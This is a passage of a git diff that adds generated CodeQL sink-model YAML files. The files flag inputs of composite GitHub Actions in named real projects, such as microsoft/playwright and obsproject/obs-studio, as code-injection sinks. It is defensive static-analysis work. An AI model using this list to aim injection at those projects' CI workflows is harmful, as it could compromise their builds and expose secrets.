diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 000000000000..7c66229c1746 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 000000000000..9eb3bdcf5ebb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 000000000000..0db95acd5cd2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 000000000000..785384aa2073 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 000000000000..24c4fb4bc707 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 000000000000..72575eb73684 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 000000000000..b2b49fbba09c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 000000000000..6755f0d773ce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 000000000000..1b55ab2d5490 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 000000000000..84401828721d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..35804a87f055 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 000000000000..981fe0fd3485 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 000000000000..6c984a676d06 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 000000000000..1138d37fb5fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 000000000000..1418299b39ab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 000000000000..fb67f66ce62c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 000000000000..12aa48431db9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 000000000000..336af4b814b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 000000000000..8d2170c47e29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 000000000000..854601e3ddeb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 000000000000..8a6074b87963 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 000000000000..f305e2a37b34 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 000000000000..042ca09efa62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 000000000000..51d4903fbb10 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 000000000000..12dc3005260e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 000000000000..dfe3b7f43329 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 000000000000..663fada6df9a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 000000000000..4a53345e6e5a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 000000000000..0a18189242de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 000000000000..93ec3ea468de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 000000000000..27f5af98f89a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 000000000000..125dd8324d21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 000000000000..dfa24454444e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 000000000000..9469e745ffcc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..6e34a2cf5927 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 000000000000..4ea72b28476a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 000000000000..a0b7bca54ad2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 000000000000..816a18fe73b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 000000000000..bf8cbfc01e02 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] + - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 000000000000..bf88ed5c0a11 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 000000000000..05c2a1cfaf67 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 000000000000..46a8fd4fb8b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 000000000000..32467f8c3f20 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] + - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 000000000000..3f4cc69ba75b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 000000000000..8b8ebf88b468 --- 